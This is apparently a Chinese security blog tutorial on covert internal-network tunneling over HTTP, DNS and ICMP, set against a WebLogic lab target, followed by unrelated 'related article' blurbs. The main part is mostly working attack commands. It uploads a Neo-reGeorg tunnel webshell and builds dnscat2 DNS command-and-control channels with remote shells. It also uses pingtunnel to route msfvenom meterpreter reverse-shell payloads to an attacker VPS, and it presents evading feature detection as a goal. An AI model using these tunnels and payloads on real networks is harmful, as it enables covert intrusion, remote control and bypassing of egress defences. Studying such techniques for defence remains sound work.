内网隧道—HTTP\DNS\ICMP

       本文仅限于安全研究和学习,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任!

HTTP隧道

Neo-reGeorg

Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目,目的是:

提高可用性,避免特征检测
提高 tunnel 连接安全性
提高传输内容保密性
应对更多的网络环境场景下使用

靶场环境:cve-2017-10271  weblogic

#靶场攻击过程,使用脚本工具得到shell,在此略过

1.设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器

 2.使用蚁剑上传JSP文件

上传至此目录:可以访问到文件

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/

3.使用 neoreg.py 连接WEB服务器,在本地建立 socks 代理,代理默认端口 1080

修改配置文件:vim proxychains4.conf

 执行命令:

 #测试代理: proxychains curl 127.0.0.1:7001

DNS隧道

Dnscat2

       dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大
特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包
括:文件上传、下载、反弹Shell。
直连模式:客户端直接向指定IP的恶意DNS服务器发起DNS解析请求。

中继模式:像我们平时上网一样,DNS解析先经过互联网的迭代解析,最后指向我们
的恶意DNS服务器。相比直连,速度较慢,但是更安全。

服务端安装

apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler

git clone https://github.com/iagox86/dnscat2.git(也可以先下载文件,然后上传至VPS)
cd dnscat2/server
bundle install   #如此命令报错,和本地网络有关,多试几次


客户端编译

Linux:

git clone https://github.com/iagox86/dnscat2.git  
cd dnscat2/client/
make  

Windows:

下载Windows版本

在本地编译上传

上传已经编译好的 .exe程序

make编译之后会在此目录下生成一个dnscat可执行二进制文件。
Linux systemd-resolve占用53端口的解决方法: https://www.itren.org/319.h
tml

Dnscat2直连模式

启动服务端

ruby ./dnscat2.rb

 启动客户端

 vps收到会话

help

windows

 进入session 1: session -i 1

shell    #获取主机shell

进入session 2 : session -i 2

 执行命令:

whoami

 直连模式流量特征:tcpdump udp dst port 53

Dnscat2中继模式

环境准备: 
1. 一台公网C&C服务器      
2. 一台内网靶机              #以win7为例
3. 一个可配置解析的域名

配置DNS域名解析:
创建A记录,将自己的域名解析服务器(ns.hack.com)指向云服务器(VPS IP)

A类解析是在告诉域名系统,ns.hacker.com的IP地址是 xxx.xxx.xxx.xxx

创建NS记录,将子域名 dns.hetian.cn 的DNS解析交给 ns.hack.com
NS解析是在告诉域名系统,想要知道 dns.hack.com 的IP地址,就去问ns.hacker.com 

 vps防火墙设置:开放全部UDP端口

启动服务端

ruby ./dnscat2.rb dns.xxx.xxx --secret=abcd

secret --指定密码

启动客户端

server #指定VPS地址

服务端收到session 3

获取shell

进入会话:session -i 4

执行命令: whoami

 

ICMP隧道

Pingtunnel

ICMP隧道
      通过某种信道获取了内网主机的shell,但是当前信道不适合做远控的通信信道,
tcp 和 udp 等传输层协议不能出网, dns 、 http 等应用层协议也不能出网,只有
icmp 协议可以出网。

目的:上线仅icmp协议出网的内网主机

ICMP隧道转发TCP上线MSF

1.VPS启动ICMP隧道服务端

./pingtunnel -type server -noprint 1 -nolog 1

2.靶机启动ICMP隧道客户端

pingtunnel.exe -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:7777 -tcp 1 -noprint 1 -nolog 1


3. MSF 生成反弹 shell 的 payload 上传到靶机

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=9999 -f exe > hot.exe

 4.执行 payload 反弹 shell 到 MSF

设置侦听:

msfconsole

use exploit/multi/handler

set lhost xx.xx.xx.xx   (vps的内网IP)

set lport 8866

set payload windows/x64/meterpreter/reverse_tcp

exploit

5. 靶机执行payload,msf上线

 

ICMP隧道转发Socks上线MSF

1. VPS启动ICMP隧道服务端

./pingtunnel -type server -noprint 1 -nolog 1

2.靶机启动ICMP隧道客户端

pingtunnel.exe -type client -l 127.0.0.1:9999 -s VPSIP -sock5 1 -noprint 1 -nolog 1

#  icmp隧道客户端监听127.0.0.1:9999启动socks5服务,
    通过连接到VPS IP的icmp隧道,
    由icmpserver转发socks5代理请求到目的地址 VPSIP:8899

3.MSF 生成反弹 shell 的 payload 上传到靶机,并执行

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=VPSIP lport=8866 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f exe > c2.exe

 5.设置侦听

handler -p windows/x64/meterpreter/reverse_tcp -H xx.xx.xx.xx -P8866

#IP是vps的内网IP

 6.MSF收到会话

 可以执行命令

参考:

内网渗透之内网穿透 - 先知社区

...

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/67417.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

springBoot整合RabbitMq实现手动确认消息

如何保证消息的可靠性投递? 1.保证生产者向broke可靠性投递,开启ack投递成功确认,如果失败的话进行消息补偿 /*** author yueF_L* date 2023-08-10 01:32* ConfirmCallback:消息只要被 RabbitMQ broker 接收到就会触发confirm方…

tomcat7.exe 启动闪退解决

标题tomcat7.exe 启动闪退解决 双击tomcat7.exe启动,但是出现闪退问题,无法启动tomcat 解决: 1.解决 tomcat7.exe 启动闪退解决 第一步:双击打开tomcat7w.exe 文件 如果出现 “指定的服务未安装。 Unable to open the service ‘…

FFmpeg常见命令行(三):FFmpeg转码

前言 在Android音视频开发中,网上知识点过于零碎,自学起来难度非常大,不过音视频大牛Jhuster提出了《Android 音视频从入门到提高 - 任务列表》。本文是Android音视频任务列表的其中一个, 对应的要学习的内容是:如何使…

vue项目中Uncaught runtime errors:怎样关闭

原文链接: yvue项目中Uncaught runtime errors:怎样关闭_笑毅的博客-CSDN博客https://blog.csdn.net/qq_36877078/article/details/131175355是webpack-dev-server弄出来的 解决办法 在vue.config.js中添加如下配置 module.exports defineConfig({...devServer:…

php代码审计,php漏洞详解

文章目录 1、输入验证和输出显示2、命令注入(Command Injection)3、eval 注入(Eval Injection)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL 注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)7、Session 会话劫持(Session Hijacking…

虾皮运营每天需要做什么?如何处理后台数据?

#shopee#​有很多朋友想做电商,但是对电商运营比较朦胧,不知道电商运营每天到底该做些什么。今天咱们就来解析下,Shopee电商运营每天该做哪些事情一个合格的电商运营,每天都会做好以下几点: 一、查看数据: …

【100天精通python】Day31:使用python操作数据库_数据库编程接口,连接对象和游标对象,数据库连接配置

目录 专栏导读 一、数据库编程接口 1. Python标准库接口 2. MySQL Connector/Python接口 3. Psycopg2接口(用于连接PostgreSQL数据库) 4. SQLAlchemy接口 二、连接对象和游标对象 1. 连接对象(Connection Object) 2. 游标…

❤ vue3 使用 ElementPlus

❤ vue3 使用ElementPlus 承接自上一篇文章 VUE3 项目具体配置(二) ① 使用 ElementPlus Icon 图标 官网地址: https://element-plus.org/zh-CN/component/icon.html 1、安装 yarn add element-plus/icons-vue安装成功以后: …

【分布式技术专题】「数据一致性体系」带你一同建立采用消息队列实现的数据一致性框架技术体系方案

带你一同建立采用消息队列实现的数据一致性框架技术体系方案 分布式服务数据一致性问题采用分布式事务3PC模式3PC模式阶段分析 采用分布式锁采用数据同步机制采用数据分片机制针对常规方案所具有的问题预发送消息阶段切换为可发送状态定时补偿更新为可发送状态定时补偿发送数据…

Java基础篇--基本数据类型

目录 前言: 内置数据类型 类型默认值 示例: 内置数据类型转换 自动类型转换(隐式类型转换): 强制类型转换(显式类型转换): 隐含强制类型转换: 引用类型 前言: …

浅谈JVM中的即时编译器(Just-In-Time compiler, JIT)

Java虚拟机(JVM)中的即时编译器(Just-In-Time compiler, JIT)是一个非常重要的组件,它负责将字节码转换为本地机器代码。在不使用JIT的情况下,JVM通过解释字节码来执行程序,这意味着它会为每个字…

Vue2嵌入HTML页面空白、互相传参、延迟加载等问题解决方案

一、需求分析 最近做的一个用H5加原生开发的html项目,现需要集成到Vue2.0项目里面来。遇到的相关问题做个记录和总结,以便能帮到大家避免踩坑。 二、问题记录 1、页面空白问题 将html页面通过iframe的方式嵌入进来之后,发现页面是空白的&am…

2023牛客暑期多校训练营7(C/I/M)

目录 C.Beautiful Sequence I.We Love Strings M.Writing Books C.Beautiful Sequence 思路:显然若得到了a[1],则整个序列a我们都知道了。所以我们要求出第k大的a[1],这个可以利用序列a为不递减序列的性质来得出。 首先,由题…

商品推荐系统浅析 | 京东云技术团队

一、综述 本文主要做推荐系统浅析,主要介绍推荐系统的定义,推荐系统的基础框架,简单介绍设计推荐的相关方法以及架构。适用于部分对推荐系统感兴趣的同学以及有相关基础的同学,本人水平有限,欢迎大家指正。 二、商品…

独立站如何进行Facebook广告投放?关于广告投放策略的真相

谷歌广告是独立站卖家推广引流的首选渠道,那么谷歌广告该如何投放?在这个过程中有哪些需要特别注意的吗? 创建Facebook广告账户: 访问Facebook广告管理平台(Ads Manager)并创建一个广告账户。您需要提供一…

Towards Open World Object Detection【论文解析】

Towards Open World Object Detection 摘要1 介绍2 相关研究3 开放世界目标检测4 ORE:开放世界目标检测器4.1 对比聚类4.2 RPN自动标注未知类别4.3 基于能量的未知标识4.4 减少遗忘 5 实验5.1开放世界评估协议5.2 实现细节5.3 开放世界目标检测结果5.4 增量目标检测结果 6 讨论…

【ArcGIS Pro二次开发】(56):界址点导出Excel

界址点成果表是地籍测绘中的一种表格,用于记录地块的界址点坐标和相关属性信息。 这个工具的目的就是为了将地块要素导出为界址点成果表。 一、要实现的功能 如上图所示,在【数据处理】组—【Excel相关】面板下,点击【界址点导出Excel】工具。…

linux文件I/O之 open() 函数用法

#include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> typedef unsigned int mode_t ; int open(const char *pathname, int flags); int open(const char *pathname, int flags, mode_t mode); 函数功能 打开或创建一个文件 返回值 成功…

21、springboot的宽松绑定及属性处理类的构造注入

springboot的宽松绑定及属性处理类的构造注入 ★ 如何使用属性处理类所读取的属性 属性处理类最终变成了Spring容器中的一个Bean组件&#xff0c;因此接下来Spring即可将该Bean组件注入任意其他组件。 这种做法的好处是&#xff1a;可以将大量的配置信息封装一个对象——所以…

JavaScript的三大组成部分是什么?JavaScript的核心组成部分解析:语法、BOM和DOM

&#x1f337;&#x1f341; 博主猫头虎 带您 Go to New World.✨&#x1f341; &#x1f984; 博客首页——猫头虎的博客&#x1f390; &#x1f433;《面试题大全专栏》 文章图文并茂&#x1f995;生动形象&#x1f996;简单易学&#xff01;欢迎大家来踩踩~&#x1f33a; &a…